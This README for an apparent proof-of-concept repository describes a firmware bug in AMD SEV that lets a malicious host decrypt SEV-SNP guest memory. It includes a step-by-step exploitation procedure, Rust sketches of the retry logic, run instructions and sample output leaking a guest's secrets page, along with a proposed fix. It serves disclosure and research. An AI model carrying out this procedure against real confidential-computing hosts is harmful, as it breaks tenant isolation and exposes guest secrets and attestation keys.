This repo contains an exploit for a vulnerability in the SEV firmware. The exploit allows decrypting arbitrary memory of a running SEV-SNP guest.
Tested on version 1.55.16 (latest as of the time of writing).
The `nv_paddr` field of the `SEV_INIT_EX` command can be used to donate a chunk of memory to the firmware, so that it can be used instead of the persistent flash. If SEV-SNP is enabled, this memory has to be in the `FIRMWARE` state. The firmware checks this once while executing the `SEV_INIT_EX` command. From then on, the firmware assumes that this memory is in the `FIRMWARE` state and writes to it without any additional checks.
The assumption that the memory is still in the `FIRMWARE` state is not always correct: nothing prevents the host from changing the state back to the `HYPERVISOR` state using the `SNP_PAGE_RECLAIM` command. Once the pages are in the `HYPERVISOR` state, they can be transitioned into other states, e.g. `CONTEXT`. Even though the pages are no longer in the `FIRMWARE` state, the firmware will still write to them, thus breaking the integrity required by certain page states.
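The check-once pattern can be illustrated with a toy model. This is only a sketch of the logic described above, not the firmware's code: `PageState`, `ToyFirmware`, and all method names are hypothetical, and the model tracks a single page instead of a real RMP.

```rust
/// Toy model of the page states named in the text. Illustrative only; the
/// real RMP has more states and is maintained by hardware and firmware.
#[derive(Clone, Copy, Debug, PartialEq, Eq)]
pub enum PageState {
    Hypervisor,
    Firmware,
    Context,
}

/// Hypothetical stand-in for the firmware's view of the donated page.
pub struct ToyFirmware {
    /// State of the single page we model (what the RMP would record).
    pub page_state: PageState,
    /// Set once by `init_ex` and never re-validated afterwards.
    nv_registered: bool,
    /// Number of NV writes that landed on a page not in the Firmware state.
    pub unchecked_writes: u32,
}

impl ToyFirmware {
    pub fn new() -> Self {
        Self {
            page_state: PageState::Hypervisor,
            nv_registered: false,
            unchecked_writes: 0,
        }
    }

    /// Models SEV_INIT_EX: the page state is checked here, and only here.
    pub fn init_ex(&mut self) -> Result<(), &'static str> {
        if self.page_state != PageState::Firmware {
            return Err("nv page must be in the FIRMWARE state");
        }
        self.nv_registered = true;
        Ok(())
    }

    /// Models a later NV write. The bug: the write happens without checking
    /// the page state again, so we only count the writes that should not
    /// have been allowed.
    pub fn write_nv(&mut self) {
        if self.nv_registered && self.page_state != PageState::Firmware {
            self.unchecked_writes += 1;
        }
    }
}
```

In this model, calling `init_ex` while the page is in `PageState::Firmware`, then setting `page_state` to `PageState::Context` and calling `write_nv`, increments `unchecked_writes`, which mirrors the write into a page that has since changed state.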
We can exploit this memory corruption by targeting `CONTEXT` pages. `CONTEXT` pages are a powerful target, but there are some problems:
- `CONTEXT` pages are encrypted with a different key than other memory. As a result, it's not easy to control the plaintext even if we could control the ciphertext.
- We don't have a lot of control over the memory written by the firmware.
The memory corruption effectively fills the `CONTEXT` page with random data, so it's not easy to corrupt `CONTEXT` pages in a way that is useful to the attacker. To work around that, we can repeatedly trigger the bug and use the `SNP_GUEST_STATUS` command to read back the relevant fields of the corrupted `CONTEXT` page until we observe values that are useful.
The `SNP_DBG_DECRYPT` command can be used to decrypt the memory of a SEV-SNP guest with the `DEBUG` policy enabled. If we can craft a `CONTEXT` page so that it has the `DEBUG` flag set and contains the `ASID` of another guest, we can use it to decrypt the memory of the other guest even though that guest doesn't have the `DEBUG` policy set.
It turns out that `SNP_DBG_DECRYPT` ignores most fields in the `CONTEXT` page; it only checks `gctx->guest.asid`, `gctx->guest.policy_snp` and `gctx->guest.guest_flags`. The chance of these fields being correct after the memory corruption is not high, but it's not out of the realm of possibility either. The good news is that we can read all of those fields using the `SNP_GUEST_STATUS` command.
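A minimal sketch of the "are the read-back fields useful?" check might look like the following. The struct, the function name, and in particular the position of the DEBUG bit are assumptions made for illustration and should be verified against the SEV-SNP firmware ABI specification; the `guest_flags` condition is left out because the text above does not spell it out.

```rust
/// Fields read back from a corrupted CONTEXT page. The layout and types are
/// assumptions for illustration, not the firmware's actual structures.
#[derive(Clone, Copy, Debug)]
pub struct GuestFields {
    pub asid: u32,
    pub policy: u64,
}

/// ASSUMPTION: position of the DEBUG bit in the guest policy. Check the
/// firmware ABI specification before relying on this value.
pub const POLICY_DEBUG_BIT: u64 = 1 << 19;

/// Returns true if the fields look usable: the ASID is one a guest could be
/// assigned (1..=max_asid) and the DEBUG policy bit is set.
/// The guest_flags check mentioned in the text is intentionally not modeled.
pub fn looks_usable(fields: &GuestFields, max_asid: u32) -> bool {
    let asid_ok = (1..=max_asid).contains(&fields.asid);
    let debug_ok = (fields.policy & POLICY_DEBUG_BIT) != 0;
    asid_ok && debug_ok
}
```

With 509 valid ASIDs, `max_asid` would be 509, so an ASID of `0` (no ASID assigned) or any value above 509 is rejected regardless of the policy bits.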
In conclusion, we can exploit the bug with the following steps:
1. Transition `nv_paddr` into the `FIRMWARE` state using the `rmpupdate` instruction.
2. Execute the `SEV_INIT_EX` command.
3. Transition `nv_paddr` back into the `HYPERVISOR` state using the `SNP_PAGE_RECLAIM` command.
4. Create one or more `CONTEXT` pages at `nv_paddr`.
5. Trick the firmware into writing to `nv_paddr` using the `SEV_PDH_GEN` command. This corrupts the `CONTEXT` pages.
6. Use the `SNP_GUEST_STATUS` command to check whether `SNP_DBG_DECRYPT` would succeed; if not, go back to step 5. The main bottleneck here is that ASIDs are stored in a 32-bit integer, but there are far fewer valid ASIDs (509 or 1006 depending on the CPU), so it takes a large number of attempts to get this right.
7. Launch (and optionally run) a victim guest using the ASID found in the corrupted `CONTEXT` page. Keep track of the secrets page. This is possible because the SEV firmware tracks active ASIDs internally and doesn't check the active `CONTEXT` pages for duplicates.
8. Use the corrupted `CONTEXT` page to execute `SNP_DBG_DECRYPT` on the secrets page of the victim guest.
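The retry loop formed by steps 5 and 6 can be sketched as follows. This is not the PoC's code: the `Platform` trait, `search_asid`, and the `Replay` test double are hypothetical names, and only the ASID condition is modeled (the real check also involves the policy and guest flags).

```rust
/// Hypothetical abstraction over the two firmware interactions in steps 5 and 6.
pub trait Platform {
    /// Step 5: trigger the NV write that corrupts the CONTEXT page.
    fn trigger_corruption(&mut self);
    /// Step 6: read back the ASID the firmware now reports for the page.
    fn read_asid(&mut self) -> u32;
}

/// Repeats steps 5 and 6 until the reported ASID falls in 1..=max_asid or the
/// attempt budget is exhausted. Returns the ASID and the attempts used.
pub fn search_asid<P: Platform>(
    platform: &mut P,
    max_asid: u32,
    max_attempts: u64,
) -> Option<(u32, u64)> {
    for attempt in 1..=max_attempts {
        platform.trigger_corruption();
        let asid = platform.read_asid();
        if (1..=max_asid).contains(&asid) {
            return Some((asid, attempt));
        }
    }
    None
}

/// Test double that replays a fixed, non-empty list of ASIDs instead of
/// talking to real firmware.
pub struct Replay {
    pub asids: Vec<u32>,
    pub pos: usize,
    pub current: u32,
}

impl Platform for Replay {
    fn trigger_corruption(&mut self) {
        // Each "corruption" moves on to the next canned value.
        self.current = self.asids[self.pos % self.asids.len()];
        self.pos += 1;
    }

    fn read_asid(&mut self) -> u32 {
        self.current
    }
}
```

Putting the firmware interaction behind a trait keeps the loop testable without SEV hardware; a real implementation of `Platform` would issue the commands named in steps 5 and 6.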
The exploit spends most of its time on steps 5 and 6. The chances of hitting all the right conditions are about 1/20,000,000 on an EPYC Milan and we can do about 100 attempts per second, so we expect to hit the right conditions about once every two days (warning: the calculations are only approximations and I may have messed something up, but anecdotally, once every two days feels about right). We can speed this up by attacking not just one `CONTEXT` page at a time, but three `CONTEXT` pages at `nv_paddr`, `nv_paddr+4096`, and `nv_paddr+8192` (`SEV_PDH_GEN` will corrupt three pages). Conveniently, those steps can be done ahead of launching the victim guest and only have to succeed once to attack an arbitrary number of guests (note that the PoC currently attacks just one guest, though).
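The estimate above can be reproduced with a few lines of arithmetic. The sketch below assumes that attempts are independent, so the number of attempts until the first success follows a geometric distribution with mean 1/p; the function names are hypothetical. With p = 1/20,000,000 and 100 attempts per second, this gives roughly 200,000 seconds, or about 2.3 days.

```rust
/// Expected number of seconds until the first success, assuming independent
/// attempts that each succeed with probability `p` (geometric distribution,
/// mean number of attempts = 1/p).
pub fn expected_seconds(p: f64, attempts_per_sec: f64) -> f64 {
    1.0 / (p * attempts_per_sec)
}

/// Probability that at least one of `pages` pages ends up usable in a single
/// attempt, ASSUMING each page is corrupted independently with probability `p`.
pub fn p_any(p: f64, pages: i32) -> f64 {
    1.0 - (1.0 - p).powi(pages)
}

/// Converts seconds to days.
pub fn seconds_to_days(seconds: f64) -> f64 {
    seconds / 86_400.0
}
```

If the 1/20,000,000 figure is read as a per-page probability and the three pages are corrupted independently (both are assumptions, not claims from the measurements above), `seconds_to_days(expected_seconds(p_any(1.0 / 20_000_000.0, 3), 100.0))` comes out at under one day.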
Although I haven't been able to test this yet, I believe that once an attacker has used this vulnerability to leak the guest's virtual machine platform communication keys, she should be able to send guest messages to the firmware on the guest's behalf and use this to request attestation reports. This violates a key principle of SEV-SNP: only the guest should be able to request attestation reports.
A few commands (e.g. `SNP_PAGE_RECLAIM`, `SNP_GCTX_CREATE`, `RING_BUFFER`, maybe more?, maybe all just to be safe?) that accept a `FIRMWARE` page should check whether it overlaps with `nv_paddr` and fail if it does.
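The suggested check boils down to a range-overlap test. The following is a sketch of that logic only, written in Rust for illustration; the function names, the 4096-byte page size constant, and the `nv_len` parameter (the size of the donated region) are assumptions, and the actual firmware would implement this in its own code base.

```rust
/// Returns true if the half-open byte ranges [a, a + a_len) and
/// [b, b + b_len) intersect. Empty ranges never overlap anything.
pub fn ranges_overlap(a: u64, a_len: u64, b: u64, b_len: u64) -> bool {
    if a_len == 0 || b_len == 0 {
        return false;
    }
    // saturating_add avoids wraparound for ranges near the top of the
    // address space.
    a < b.saturating_add(b_len) && b < a.saturating_add(a_len)
}

/// Hypothetical guard a command handler could run before operating on a
/// page: fail if the page intersects the donated NV region.
pub fn check_page_allowed(
    page_paddr: u64,
    nv_paddr: u64,
    nv_len: u64,
) -> Result<(), &'static str> {
    const PAGE_SIZE: u64 = 4096; // assumed page size
    if ranges_overlap(page_paddr, PAGE_SIZE, nv_paddr, nv_len) {
        Err("page overlaps the NV region donated via SEV_INIT_EX")
    } else {
        Ok(())
    }
}
```

Checking the full range instead of comparing only the start addresses matters here because the donated region spans several pages.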
There's one more concern I have, which I'm not sure is valid and would love to hear y'all's opinion on: IIUC the SEV firmware can be upgraded without interrupting running guests. This implies to me that it would be possible to carry over the corrupted `CONTEXT` page from an old vulnerable firmware version to a new fixed firmware version. Would it be possible to start on an older vulnerable version, do the exploit described above, upgrade and commit the new fixed firmware, launch the guest with the new firmware (so that the old firmware version doesn't show up in the attestation report) and then use the corrupted `CONTEXT` page created using the old firmware to attack the guest created using the new version? Would a consumer of the attestation reports created by the new guest be able to tell that the old firmware version was running at some point before the new guest was launched? If not, are further mitigations required to prevent this from happening?
- Apply the patches in the linux-patches folder to the tip of https://github.com/AMDESE/linux/commits/snp-host-v10. Build, install, and boot the kernel.
- Run the PoC.
root@server:~/sev-exploit# cargo run --release Finished release [optimized] target(s) in 0.12s Running `target/release/sev-exploit` Corrupt guest context page so that ASID is in range 1..510 Smallest ASID: 0x0000001f iterations: 14052175 zeros: 10539628 unique asids: 31500727 elapsed time: 1d 19h 20m 31s Creating VM with same ASID [03, 00, 00, 00, 00, 00, 00, 00, 11, 0f, a0, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, f0, 51, a5, 03, 3f, 69, 6b, 93, e8, d8, 61, 0d, 2e, 5a, 45, f1, ea, 6d, bf, 49, fe, e4, a9, 2d, 8d, af, 76, 5e, 2e, 56, e0, fa, a9, b3, a7, e0, bc, 09, d9, 4f, 28, 5c, 9f, 84, d2, 7e, 34, eb, ea, 3f, 29, 88, 30, 01, 28, 65, 8b, 73, 3c, 84, 00, ae, 4a, 74, a2, 7a, d1, c7, 4f, 63, 7f, 72, 7b, 3b, 2f, 08, b3, 1a, 8c, 99, 1b, ad, b5, 1d, 42, 0b, 4d, 98, d4, 7d, c1, 0b, d6, 2f, b4, 6c, 6b, 51, a2, 92, 17, 3b, 01, e8, 82, 11, 1e, cb, cb, a2, 8f, c9, b0, 52, 1d, 1d, b7, d2, 25, 8d, 32, a9, 7a, 6f, 86, e4, 40, 44, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 80, 00, 88, 00, 00, 00, 00, ee, ff, 00, 00, f0, ff, ff, ff, ff, ff, ff, ff, ff, 3f, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, <cut off zeros>] thread 'main' panicked at src/main.rs:170:13: not yet implemented: use the leaked secrets to send guest messages note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace
Note that it's normal for the exploit to run for a significant amount of time (on the order of hours if you're lucky, days if you're not). Running on an EPYC Genoa will likely be faster because there are almost two times more valid ASIDs.
During steps 5 and 6 the PoC displays some metrics:
- "Smallest ASID": The smallest ASID encountered so far. This is just a sanity check metric to make sure that we encounter smaller and smaller ASIDs over time.
- "iterations": This metric is increased every time the bug is triggered.
- "zeros": In about 1/4 of cases, the `CONTEXT` page is in a state where the firmware considers it not to have an ASID assigned yet. In those cases `SNP_GUEST_STATUS` will return `0` in the ASID field.
- "unique asids": Another sanity check metric just to make sure that ASIDs are random and don't repeat after some time.
- "elapsed time": Duration since the PoC was started.
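The bookkeeping behind these metrics could look roughly like the sketch below. It is not taken from the PoC: the `Metrics` type and its `record` method are hypothetical, and treating a zero ASID as excluded from both "Smallest ASID" and "unique asids" is an assumption.

```rust
use std::collections::HashSet;

/// Hypothetical counters mirroring the metrics listed above.
#[derive(Default)]
pub struct Metrics {
    /// Smallest non-zero ASID seen so far, if any.
    pub smallest_asid: Option<u32>,
    /// Number of times the bug has been triggered.
    pub iterations: u64,
    /// Number of read-backs that reported ASID 0 (no ASID assigned).
    pub zeros: u64,
    /// Distinct non-zero ASIDs seen so far.
    pub unique_asids: HashSet<u32>,
}

impl Metrics {
    /// Records one trigger of the bug together with the ASIDs read back
    /// afterwards (one per attacked CONTEXT page).
    pub fn record(&mut self, asids: &[u32]) {
        self.iterations += 1;
        for &asid in asids {
            if asid == 0 {
                // ASSUMPTION: zeros are counted separately and skipped below.
                self.zeros += 1;
                continue;
            }
            self.unique_asids.insert(asid);
            let smallest = self.smallest_asid.map_or(asid, |s| s.min(asid));
            self.smallest_asid = Some(smallest);
        }
    }
}
```

Because several pages can be attacked per iteration, the number of unique ASIDs can exceed the iteration count, as it does in the sample output.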
In most cases, decommissioning corrupted `CONTEXT` pages causes a crash of the firmware (most likely here). AFAICT, crashes of the firmware cause a reset of the whole system. To avoid such crashes, the kernel patches prevent `CONTEXT` pages from being decommissioned. One downside of this is that the `ccp` kernel module cannot be unloaded. Once the PoC has been started, the whole system has to be rebooted before it can be started again (regardless of whether the PoC succeeded or was aborted).